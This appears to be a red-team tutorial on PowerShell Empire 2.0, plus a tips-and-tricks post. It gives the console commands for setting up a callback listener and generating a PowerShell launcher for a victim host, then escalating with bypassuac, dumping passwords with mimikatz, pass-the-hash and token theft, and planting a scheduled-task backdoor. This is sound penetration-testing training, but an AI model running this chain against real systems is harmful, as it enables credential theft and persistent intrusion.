Empire

POST-EXPLOITATION WITH POWERSHELL EMPIRE 2.0

welcome to this exciting tutorial about the new Empire version 2.0.

I’m pretty sure you’re curious and want to learn how to use it. In this lesson, I will walk you through and show you all the tricks so you can achieve your goals as a member of the red-team or as a penetration tester.

Let’s see together the workflow that I’ll be using for this demo.

First, I will show you how to install Empire

Second, you will learn how to create a listener. If you don’t know what a listener means. In fact, its name explains what it does, the listener listens for incoming connections from infected victims.

Next, I will show you how to create a PowerShell script to send it to your victim using the launcher in Empire.

Now when the victim executes the script he will be connected back to the listener and this will create an agent representing the victim machine.

All we need at this stage is to interact with the agent to escalate our privileges so we can become some sort of an admin, why? I will show you how to run Mimikatz, for example, using your admin privilege to extract the victim’s passwords.

Finally, I will make sure that you learn how to create a persistent backdoor so you can go back anytime you want.

Before I start this Demo, I want to let you know that this blog has a video demo on youtube:

Let’s start the action!

First, open your browser and go to the Empire GitHub website and click on the “Clone or download” button to copy the URL to your clipboard.

Now go and open your terminal window and execute git clone and paste the URL.

$git clone https://github.com/EmpireProject/Empire.git

 

 

This will download the application to my home root directory in Kali Linux.

$ls

 

Let’s explore this new folder.

$cd Empire

 

If I check the contents of the empire directory I can see the setup folder.

$cd setup

 

Now I’m pretty sure that our installer is somewhere here

$ls

 

Here you go it’s the install.sh file.

Let’s give it the right permission and execute it to install Empire.

$chmod +x install.sh$./install.sh

 

The installation is going to take some time so be patient. After a while, the installer will ask you to enter a password or press enter to generate a random password, I’m going to press enter, and we’re done!

I will go up one directory to execute the empire application, but before doing this I will give it the right permission as well.

$cd ..$ls

$chmod +x empire

 

Perfect, it’s the time to execute this monster.

$./empire

Voila! this is the Empire home screen. As you can see we have 267 modules ready to be used and No listeners or agents and that’s normal because it’s a fresh copy of Empire.

Let’s start by creating a listener. Type listeners

$> listeners

 

And you will get this message

[!] No listeners currently active

 

wait this is not an error message check the prompt, it changed to the listeners mode.

Next, I will choose the http based listener, so type:

$> uselistener http

 

And the prompt changed to the http listener, alright it’s time to execute it:

$> execute

 

Amazing! we should have a listener active at this moment.

$> listeners

 

Here in the details it shows that the Name of this listener is http and it’s listening on port 80 on my Kali Linux machine.

If we want to change listener options

(Empire: listeners/http) > set Host 192.168.178.16:443
(Empire: listeners/http) > set Port 443
(Empire: listeners/http) > 

At this stage we need to create a launcher just type it in the terminal window and you get this message:

By analyzing this message let’s generate a PowerShell script and the listener name is http.

$> launcher powerhshell http

Perfect, let’s copy this PowerShell script to be ready for our windows7 machine.

I will open a new terminal window and use the remote desktop to connect remotely to the victim machine -u is for the user name -p is for the password and the IP address of the windows 7 host.

Let’s open a command prompt in windows and paste the powershell script.

 

Beautiful, let’s go back to the Empire terminal window, and we have an agent active.

Type back to go to the main window.

$> back

And here type agents to list the available agents.

We can see all the information needed that represents our Win7 machine, but the name is very random so I will rename it to something more meaningful.

Type rename followed by the first two letters then press tab and it will recognize it. Then type the desired new name.

$> rename [old name] [new name]

 

To list the agents at this stage you type list

$> list

And here you go our new name for the windows 7 agent.

Let’s try to interact with this agent:

$> interact [agent name]

And type info to see the necessary information about it.

$> info

 

Pay attention here, the High priority is set to 0, that’s because we are not admin. The next step is to elevate our privileges. We can become an admin in a single command and it’s called bypassuac followed by the name of the listener.

$> bypassuac http

Wait for a couple of seconds and you should see some text coming your way, and we have a new agent.

Press enter, go back and execute the list command to see the new agent.

$> [enter]$> back

$> list

 

Check the difference here we have an asterisk before the username that means this a power user let’s rename this new agent:

$> rename [old name] [new name]

 

Let’s start interacting with this new agent.

$> interact [agent name]$> info

Pay attention to the high integrity it’s 1 instead of zero.

Perfect, let’s run Mimikatz to extract the clear text passwords but first type creds to list all the cleartext passwords, and it’s empty.

$> creds

Next, run mimikatz and wait for a few seconds to finish its execution.

$> mimikatz

Awesome! let’s see the credential list and here you go all the passwords are extracted for us.

$> creds

It’s time for our final stage and it’s the backdoor persistence, if you’re ever lost in this application you have always the chance to type the help command to see the available choices:

$> help

To create a persistent backdoor I will use the module schtasks in Empire.

$>  usemodule persistence/elevated/schtasks

Let’s check its options, I will set the onLogon to True because I want it to execute every time the victim user login to this machine. And set the listenername to http

And finally execute it:

$> info$> set onLogon True

$> set Listener http

$> execute

And we now have a persistent backdoor with a big success.

Thank you for reading this tutorial. I hope that you liked it, until the next time!In this lesson, I will walk you through and show you all the tricks so you can achieve your goals as a member of the red-team or as a penetration tester.

Empire Tips and Tricks

 Since the release of Empire at BSides Las Vegas, the project has received a lot of great feedback and use cases. While @harmj0y@sixdub and myself worked really hard on documenting all of Empire’s features, there are a few tips and tricks that weren’t documented that can be of use. I wanted to cover some additional Empire functionality so you can get the most out of the framework.

Generating a Launcher

Empire stagers are the various methods you can use to trigger Empire agents on systems. The ‘launcher’ format generates the straight PowerShell one-liner to start the staging process, and one we commonly use in engagements as well as testing. If you are simply in need of the PowerShell one-liner, you can simply type “launcher <listenerName>” from the listener menu and this will quickly generate the one-liner for you. The listener names are tab-completable.

empire_stager_listener

 

Renaming Agents

After receiving agents, there are also a few shortcuts that will help you easily with shell management. When an agent comes in, it will always have a randomized name. Since this can sometimes make for difficult agent identification, Empire allows you to rename agents using “rename <oldAgentName> <newAgentName>” from the agents menu:

empire_full_rename

Alternatively, you can do this within the context of an agent by typing “rename <newName>”.

empire_quick_rename

 

Stale Agents

When dealing with multiple agents, determining which ones are active and which ones have died can be accomplished by typing “list stale” in the agents menu. This will list any agents that are no longer active.

empire_list_stale

 

You can then remove all stale agents by typing “remove stale”:

remove_stale

You can also list any agents that haven’t checked in in a period of time by typing “list x”. X will be the minute window for the agent check-in. For example, “list 5” will list all agents that have called back in the last 5 minutes.

empire_list_minutes 

 

Mass Agent Configuration Changes

Empire also allows for basic configuration changes to multiple agents at once. You can accomplish this by typing “<command> all <parameter>”. For example, you can set the sleep for all agents to “0” by typing “sleep all 0”:

mass_agent_command

 

Process Listing

When searching for a specific process, Empire allows you to specify a process name with the “ps” command. To search for a specific process, you can simply type “ps <ProcessName>” to list all processes that contain that name.

process_listing

 

High Integrity Agents*

Several Empire modules require a high integrity context in order to perform certain post-exploitation agents. For example, Empire supports the use of Mimikatz to obtain credentials from memory. High integrity agents will always be identified by an asterisk (*) next to the UserName, and this information can be seen as well by running info in an agent menu. You can check if your current user is a local administrator in a medium integrity context (meaning a bypassuac attack should be run) by running the privesc/powerup/allchecks module.

agent_admin

 

The Credential Store

Empire will automatically scrape/parse Mimikatz output and throw the results into an accessible credential module that’s stored in the backend database. You can view the credentials by typing “creds”.

empire_creds

 

Searching the Credential Store

The credential store will hold both hash and plaintext credentials. Empire allows for you to search/filter the credential store, so if you are looking for specific users, you can type “creds <searchTerm>” to show all credentials matching that term.

credential_search

You can also filter by plaintext/hashes by typing “creds plaintext” (for all plaintext creds) or “creds hash” (for all hashes).

cred_plaintext_hash_filter

 

Adding Credentials to the Credential Store

If you have credentials that weren’t automatically added into the credential store, you can manually add them by typing “creds add <domain> <username> <password>”:

cred_add

 

Removing Credentials

You can also remove credentials from the credential store by typing “creds remove <credID>/<credID-credID>/all”. You can remove a single credential by specifying the CredID, remove a set of credentials by specifying the range of CredIDs, or you can remove all credentials by specifying “all”.

cred_remove_set

 

Exporting Credentials

Empire also allows you to export the credential store to a CSV. You can achieve this by typing “creds export <filePath>\file.csv”:

cred_export

cred_csv

Using CredIDs

Each set of credentials is assigned a unique CredID, and you can use this CredID within modules that require credentials:

cred_id_module

Alternatively, you can unset the CredID of a module by typing “unset CredID”. This can be used to unset any options that are set within a module. By using “unset”, it will clear out the value of the option specified.

You can also use the CredID with the “pth” command to execute use the Mimikatz PTH module with the credentials in the credential store.

pth_cred_id

 

You can then use “steal_token <pid>” to steal the token of the newly generated process.

steal_token

 

Disaster Recovery

Sometimes, things don’t always go your way. In the event of an Empire crash on the server side, you won’t lose all of your access. The agents will run in memory on the target and will keep calling home, even if your listeners are down. Empire utilizes a backend database that preserves Empire’s configuration (such as listeners). In the event of a crash, simply start empire back up and wait for your agents to check back in:

ctrl_c_quit

 

agent_recovery

 

Once Empire fires back up, your agents will slowly begin to trickle back in. You can also manually browse the Empire database by opening SQLiteBrowser in Kali and pointing it to “/data/empire.db”. This will allow you to see what all Empire retains in the backend database as well as make changes:

browse_db

 

 

db_listener_config

 

These are just a few tips and tricks that we often use when interacting with Empire.

Demos of Empire
BSIDES DC POWERSHELL EMPIRE DEMO

EMPIRE DCSYNC

BSIDES Las Vegas

Building an Empire with Powershell